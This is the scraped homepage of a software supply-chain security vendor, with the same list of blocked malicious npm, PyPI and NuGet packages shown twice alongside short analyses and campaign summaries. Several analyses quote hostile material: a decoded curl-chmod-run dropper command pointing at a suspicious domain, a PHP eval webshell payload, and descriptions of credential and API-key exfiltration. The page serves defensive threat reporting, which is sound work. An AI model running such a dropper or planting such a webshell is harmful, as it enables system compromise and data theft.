Latest Threat Research:Malicious dYdX Packages Published to npm and PyPI After Maintainer Compromise.Details
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 4.0.0

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.2.4

We protect you from vulnerable and malicious packages

tx-engine

0.5.8

Live on PyPI

Blocked by Socket

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

fusionsc

2.0.0a2

Live on PyPI

Blocked by Socket

The code poses a security risk and should be reviewed carefully before use. The lack of input sanitization poses a potential vulnerability, and the script sends data to an external server without clear justification.

@twork-data-services/customer-storage-api-v3-customer-attribute

3.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

exp10it

2.4.15

Live on PyPI

Blocked by Socket

This source code is a malicious exploit script designed to remotely install a PHP webshell (vvv<?php eval($_POST[zzz]);?>) on a target web server by delivering an eval-wrapped, chr()-encoded payload via the HTTP User-Agent header and then verifying installation. Despite syntactic errors in the provided fragment, the intent, payload, and delivery mechanism are clear. Do not run this code; treat any occurrences as a high-risk compromise indicator and remove/report accordingly.

simplepy

1.7.4

Live on PyPI

Blocked by Socket

This file contains functionality to access email accounts and extract Instagram one-time verification codes, including a hardcoded plaintext credential. It logs and prints sensitive email subjects and contents without redaction. The module is capable of harvesting high-value authentication tokens (OTPs). Even though no explicit remote exfiltration is present in this snippet, the presence of hardcoded secrets and OTP harvesting logic makes this code dangerous and likely malicious in intent or at least a severe security/privacy risk. Do not run this code on sensitive accounts; remove hardcoded credentials and OTP-extraction logic, and ensure all logging of sensitive content is eliminated or redacted.

tx.vdf.gdal

1.0.2.2

by TianTeng

Live on NuGet

Blocked by Socket

The assembly contains heavy obfuscation and a runtime loader that decrypts embedded data and performs unmanaged memory allocation, memory writes, protection changes and delegate creation/invocation. These operations enable in-memory code execution and process injection. Combined with hardcoded symmetric keys and anti-tamper/expiry checks, this is high-risk behavior for a library distributed on package managers. Even if intended as a legitimate protector/packer, it is not appropriate for a public dependency because it can execute arbitrary native payloads. Recommend blocking or sandbox analysis and replacing with a non-obfuscated, auditable implementation.

@pst4r8/baileys2024

7.8.80

by pst4r8

Live on npm

Blocked by Socket

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

hardhat-gas-report

1.1.29

by wangxianxiu

Removed from npm

Blocked by Socket

This script is highly suspicious and likely malicious, as it creates persistent PowerShell scripts that monitor the user's clipboard and post certain types of data to a web server. The script could be used for data theft or other malicious purposes.

Live on npm for 5 days, 2 hours and 26 minutes before removal. Socket users were protected even while the package was live.

disgrasya

5.30.1

Live on PyPI

Blocked by Socket

This script is a high-risk abuse tool: it assembles and posts full credit card data (PAN, expiry, CVV) and billing details to arbitrary WooCommerce sites using PayPal Pro Payflow fields. It prints sensitive data to stdout and contains hardcoded fake billing info to facilitate automated checkouts. There are no classic malware constructs, but its behavior strongly facilitates payment fraud. Do not run with real card data or on shared systems. Treat as malicious/abusive in operational contexts and remove or quarantine in dependency audits unless you have an explicit, legitimate testing authorization.

9router

0.2.41

Live on npm

Blocked by Socket

This module implements a cloud-sync feature that explicitly exfiltrates local provider connections and API keys to a hardcoded third-party domain (https://9router.com) and can update a local CLI settings file (~/.claude/settings.json) based on remote state and the incoming request host header. These behaviors are high-risk: uploading secrets to an external service and modifying user home files without visible consent are security-sensitive operations. If the remote service is untrusted, compromised, or the host header is attacker-controlled, this introduces a serious supply-chain/security risk. Recommend immediate review before enabling: validate the remote domain ownership/trustworthiness, require explicit user consent/opt-in, add safeguards (limit which fields are sent, encrypt secrets, validate host header), and avoid blindly overwriting user home config.

klow

0.7.29

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by downloading and executing an executable from a remote server without proper verification, potentially leading to unauthorized remote access, cryptojacking, or other malicious activities. The high confidence, malware, and security risk scores are justified based on the identified behavior in the code.

Live on npm for 47 minutes before removal. Socket users were protected even while the package was live.

yxspkg

6.9.12

Live on PyPI

Blocked by Socket

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

usaa-textarea

4.1.0

by w00dr0w

Removed from npm

Blocked by Socket

The script collects information like hostname, home directory, and current directory and sends it to a custom DNS server through DNS requests.

trufflesecurity/trufflehog

b85467e556f835f15a4755a2c984e30d13771d56

Live on GitHub Actions

Blocked by Socket

The code contains suspicious behavior by sending detected secrets to an external Zapier webhook, which poses a significant privacy and security risk. While no direct malware or obfuscation is present, this data exfiltration-like behavior warrants a high security risk score and a moderate to high malware suspicion score. The reports provided are invalid and do not reflect these findings.

imagecomponents.wpf.imaging

4.0.4.2

by Image Components

Live on NuGet

Blocked by Socket

This assembly contains heavy obfuscation, embedded encrypted resources and runtime unpacking/patching logic that reads resources/files, decrypts them and writes/executing code in process memory via native APIs and JIT/Reflection. Those behaviors are high-risk: they enable arbitrary in-memory code execution and tamper-resistant payload delivery. That pattern is commonly used by protectors/DRM but is also frequently abused by malware and supply-chain attackers. Treat this package as dangerous for most software supply chains unless you can validate the embedded resource contents and the publisher's intent. Immediate steps: isolate and reverse the embedded resource(s) in a safe sandbox, and require vendor/source verification before trusting the binary in production.

nearc

0.3.9

Live on PyPI

Blocked by Socket

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

@demoability/loadgen-core

1.3.30

by sl4x0

Live on npm

Blocked by Socket

The code is a malicious backdoor that exfiltrates sensitive system information and public IP address to an attacker-controlled domain via DNS queries. This represents a high security risk and clear malware behavior. The code is not heavily obfuscated but uses shell command chaining to hide its intent. It should be considered dangerous and avoided.

rawana-bot-qr

1.0.0

by omindubro

Removed from npm

Blocked by Socket

The code is heavily obfuscated, suggesting an attempt to conceal malicious activities. It logs sensitive authentication information ('base64EncodedAuthInfo') to the console, posing a risk of credential exposure. Additionally, it makes network requests using Axios to fetch content from an external URL ('hxxps://telegra[.]ph/file/f3b0b4e681583334b7330.jpg'), raising concerns about data exfiltration or the downloading of malicious content. The combination of logging sensitive data and connecting to external domains indicates that the code may be designed to steal data or compromise user security.

Live on npm for 7 hours and 5 minutes before removal. Socket users were protected even while the package was live.

netnut

0.3.7

by rumkin

Live on npm

Blocked by Socket

This module contains high-risk behavior: hardcoded SSH credentials and automatic execution of commands loaded from an external YAML file that get evaluated and sent to a remote shell. While there is no clear, explicit obfuscation or direct evidence of an immediate malicious payload in the code itself, the combination of embedded credentials and unvalidated remote command execution is dangerous and could be used for unauthorized remote control, data exfiltration, or other supply-chain abuse. Recommend treating this package as unsafe until credentials are removed, command sources are validated, and explicit confirmation/authorization is added before any remote actions.

zacks

1.1.1

Removed from PyPI

Blocked by Socket

This script appears to be a controlled file distribution mechanism that requires a simple passcode. The hardcoded credentials, downloading of an unknown RAR file, and writing directly to the user's desktop without proper verification pose significant security risks. This could potentially be used to distribute malware or unauthorized content.

Live on PyPI for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

admin1001

4.3.73

by teseet11111

Removed from npm

Blocked by Socket

The package contains a malicious preinstall script that kills an Office process and exfiltrates the resulting output to an external server. The test script also queries the same external host. This is high-risk and likely malicious; do not install or run this package on any machine you care about.

Live on npm for 1 day, 16 hours and 4 minutes before removal. Socket users were protected even while the package was live.

doughnuts

4.0.1

Live on PyPI

Blocked by Socket

This code constructs and delivers complex PHP payloads that provide multiple arbitrary remote code-execution vectors, includes exploit code (use-after-free, ELF parsing) to escalate capabilities, and contains anti-forensic cleanup routines. It is offensive/exploit tooling or webshell management code and should be treated as malicious for any production use. Do not use this package against systems you do not own/authorize; it poses a high supply-chain and operational risk.

file-monitor-360

0.1

Live on PyPI

Blocked by Socket

The code collects sensitive system information such as the MAC address and serial number and opens a persistent WebSocket connection to a remote server at ws://server.example.com. It transmits these identifiers via URL parameters and receives encoded commands from the server. These commands can include operations like setting passwords for remote access software, retrieving remote access IDs, restarting the system, and sending error logs back to the server. The use of subprocess calls to execute system commands without proper validation further increases the risk of unauthorized control and data leakage.

tx-engine

0.5.8

Live on PyPI

Blocked by Socket

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

fusionsc

2.0.0a2

Live on PyPI

Blocked by Socket

The code poses a security risk and should be reviewed carefully before use. The lack of input sanitization poses a potential vulnerability, and the script sends data to an external server without clear justification.

@twork-data-services/customer-storage-api-v3-customer-attribute

3.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

exp10it

2.4.15

Live on PyPI

Blocked by Socket

This source code is a malicious exploit script designed to remotely install a PHP webshell (vvv<?php eval($_POST[zzz]);?>) on a target web server by delivering an eval-wrapped, chr()-encoded payload via the HTTP User-Agent header and then verifying installation. Despite syntactic errors in the provided fragment, the intent, payload, and delivery mechanism are clear. Do not run this code; treat any occurrences as a high-risk compromise indicator and remove/report accordingly.

simplepy

1.7.4

Live on PyPI

Blocked by Socket

This file contains functionality to access email accounts and extract Instagram one-time verification codes, including a hardcoded plaintext credential. It logs and prints sensitive email subjects and contents without redaction. The module is capable of harvesting high-value authentication tokens (OTPs). Even though no explicit remote exfiltration is present in this snippet, the presence of hardcoded secrets and OTP harvesting logic makes this code dangerous and likely malicious in intent or at least a severe security/privacy risk. Do not run this code on sensitive accounts; remove hardcoded credentials and OTP-extraction logic, and ensure all logging of sensitive content is eliminated or redacted.

tx.vdf.gdal

1.0.2.2

by TianTeng

Live on NuGet

Blocked by Socket

The assembly contains heavy obfuscation and a runtime loader that decrypts embedded data and performs unmanaged memory allocation, memory writes, protection changes and delegate creation/invocation. These operations enable in-memory code execution and process injection. Combined with hardcoded symmetric keys and anti-tamper/expiry checks, this is high-risk behavior for a library distributed on package managers. Even if intended as a legitimate protector/packer, it is not appropriate for a public dependency because it can execute arbitrary native payloads. Recommend blocking or sandbox analysis and replacing with a non-obfuscated, auditable implementation.

@pst4r8/baileys2024

7.8.80

by pst4r8

Live on npm

Blocked by Socket

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

hardhat-gas-report

1.1.29

by wangxianxiu

Removed from npm

Blocked by Socket

This script is highly suspicious and likely malicious, as it creates persistent PowerShell scripts that monitor the user's clipboard and post certain types of data to a web server. The script could be used for data theft or other malicious purposes.

Live on npm for 5 days, 2 hours and 26 minutes before removal. Socket users were protected even while the package was live.

disgrasya

5.30.1

Live on PyPI

Blocked by Socket

This script is a high-risk abuse tool: it assembles and posts full credit card data (PAN, expiry, CVV) and billing details to arbitrary WooCommerce sites using PayPal Pro Payflow fields. It prints sensitive data to stdout and contains hardcoded fake billing info to facilitate automated checkouts. There are no classic malware constructs, but its behavior strongly facilitates payment fraud. Do not run with real card data or on shared systems. Treat as malicious/abusive in operational contexts and remove or quarantine in dependency audits unless you have an explicit, legitimate testing authorization.

9router

0.2.41

Live on npm

Blocked by Socket

This module implements a cloud-sync feature that explicitly exfiltrates local provider connections and API keys to a hardcoded third-party domain (https://9router.com) and can update a local CLI settings file (~/.claude/settings.json) based on remote state and the incoming request host header. These behaviors are high-risk: uploading secrets to an external service and modifying user home files without visible consent are security-sensitive operations. If the remote service is untrusted, compromised, or the host header is attacker-controlled, this introduces a serious supply-chain/security risk. Recommend immediate review before enabling: validate the remote domain ownership/trustworthiness, require explicit user consent/opt-in, add safeguards (limit which fields are sent, encrypt secrets, validate host header), and avoid blindly overwriting user home config.

klow

0.7.29

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by downloading and executing an executable from a remote server without proper verification, potentially leading to unauthorized remote access, cryptojacking, or other malicious activities. The high confidence, malware, and security risk scores are justified based on the identified behavior in the code.

Live on npm for 47 minutes before removal. Socket users were protected even while the package was live.

yxspkg

6.9.12

Live on PyPI

Blocked by Socket

The fragment is an opaque, binary/packed payload or heavily obfuscated content that cannot be reliably analyzed statically. While this alone does not prove malicious intent, it signals high risk and warrants isolation, request for a readable source or deobfuscated form, and controlled dynamic analysis to determine any harmful behavior or data leakage potential.

usaa-textarea

4.1.0

by w00dr0w

Removed from npm

Blocked by Socket

The script collects information like hostname, home directory, and current directory and sends it to a custom DNS server through DNS requests.

trufflesecurity/trufflehog

b85467e556f835f15a4755a2c984e30d13771d56

Live on GitHub Actions

Blocked by Socket

The code contains suspicious behavior by sending detected secrets to an external Zapier webhook, which poses a significant privacy and security risk. While no direct malware or obfuscation is present, this data exfiltration-like behavior warrants a high security risk score and a moderate to high malware suspicion score. The reports provided are invalid and do not reflect these findings.

imagecomponents.wpf.imaging

4.0.4.2

by Image Components

Live on NuGet

Blocked by Socket

This assembly contains heavy obfuscation, embedded encrypted resources and runtime unpacking/patching logic that reads resources/files, decrypts them and writes/executing code in process memory via native APIs and JIT/Reflection. Those behaviors are high-risk: they enable arbitrary in-memory code execution and tamper-resistant payload delivery. That pattern is commonly used by protectors/DRM but is also frequently abused by malware and supply-chain attackers. Treat this package as dangerous for most software supply chains unless you can validate the embedded resource contents and the publisher's intent. Immediate steps: isolate and reverse the embedded resource(s) in a safe sandbox, and require vendor/source verification before trusting the binary in production.

nearc

0.3.9

Live on PyPI

Blocked by Socket

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

@demoability/loadgen-core

1.3.30

by sl4x0

Live on npm

Blocked by Socket

The code is a malicious backdoor that exfiltrates sensitive system information and public IP address to an attacker-controlled domain via DNS queries. This represents a high security risk and clear malware behavior. The code is not heavily obfuscated but uses shell command chaining to hide its intent. It should be considered dangerous and avoided.

rawana-bot-qr

1.0.0

by omindubro

Removed from npm

Blocked by Socket

The code is heavily obfuscated, suggesting an attempt to conceal malicious activities. It logs sensitive authentication information ('base64EncodedAuthInfo') to the console, posing a risk of credential exposure. Additionally, it makes network requests using Axios to fetch content from an external URL ('hxxps://telegra[.]ph/file/f3b0b4e681583334b7330.jpg'), raising concerns about data exfiltration or the downloading of malicious content. The combination of logging sensitive data and connecting to external domains indicates that the code may be designed to steal data or compromise user security.

Live on npm for 7 hours and 5 minutes before removal. Socket users were protected even while the package was live.

netnut

0.3.7

by rumkin

Live on npm

Blocked by Socket

This module contains high-risk behavior: hardcoded SSH credentials and automatic execution of commands loaded from an external YAML file that get evaluated and sent to a remote shell. While there is no clear, explicit obfuscation or direct evidence of an immediate malicious payload in the code itself, the combination of embedded credentials and unvalidated remote command execution is dangerous and could be used for unauthorized remote control, data exfiltration, or other supply-chain abuse. Recommend treating this package as unsafe until credentials are removed, command sources are validated, and explicit confirmation/authorization is added before any remote actions.

zacks

1.1.1

Removed from PyPI

Blocked by Socket

This script appears to be a controlled file distribution mechanism that requires a simple passcode. The hardcoded credentials, downloading of an unknown RAR file, and writing directly to the user's desktop without proper verification pose significant security risks. This could potentially be used to distribute malware or unauthorized content.

Live on PyPI for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

admin1001

4.3.73

by teseet11111

Removed from npm

Blocked by Socket

The package contains a malicious preinstall script that kills an Office process and exfiltrates the resulting output to an external server. The test script also queries the same external host. This is high-risk and likely malicious; do not install or run this package on any machine you care about.

Live on npm for 1 day, 16 hours and 4 minutes before removal. Socket users were protected even while the package was live.

doughnuts

4.0.1

Live on PyPI

Blocked by Socket

This code constructs and delivers complex PHP payloads that provide multiple arbitrary remote code-execution vectors, includes exploit code (use-after-free, ELF parsing) to escalate capabilities, and contains anti-forensic cleanup routines. It is offensive/exploit tooling or webshell management code and should be treated as malicious for any production use. Do not use this package against systems you do not own/authorize; it poses a high supply-chain and operational risk.

file-monitor-360

0.1

Live on PyPI

Blocked by Socket

The code collects sensitive system information such as the MAC address and serial number and opens a persistent WebSocket connection to a remote server at ws://server.example.com. It transmits these identifiers via URL parameters and receives encoded commands from the server. These commands can include operations like setting passwords for remote access software, retrieving remote access IDs, restarting the system, and sending error logs back to the server. The use of subprocess calls to execute system commands without proper validation further increases the risk of unauthorized control and data leakage.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

42 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles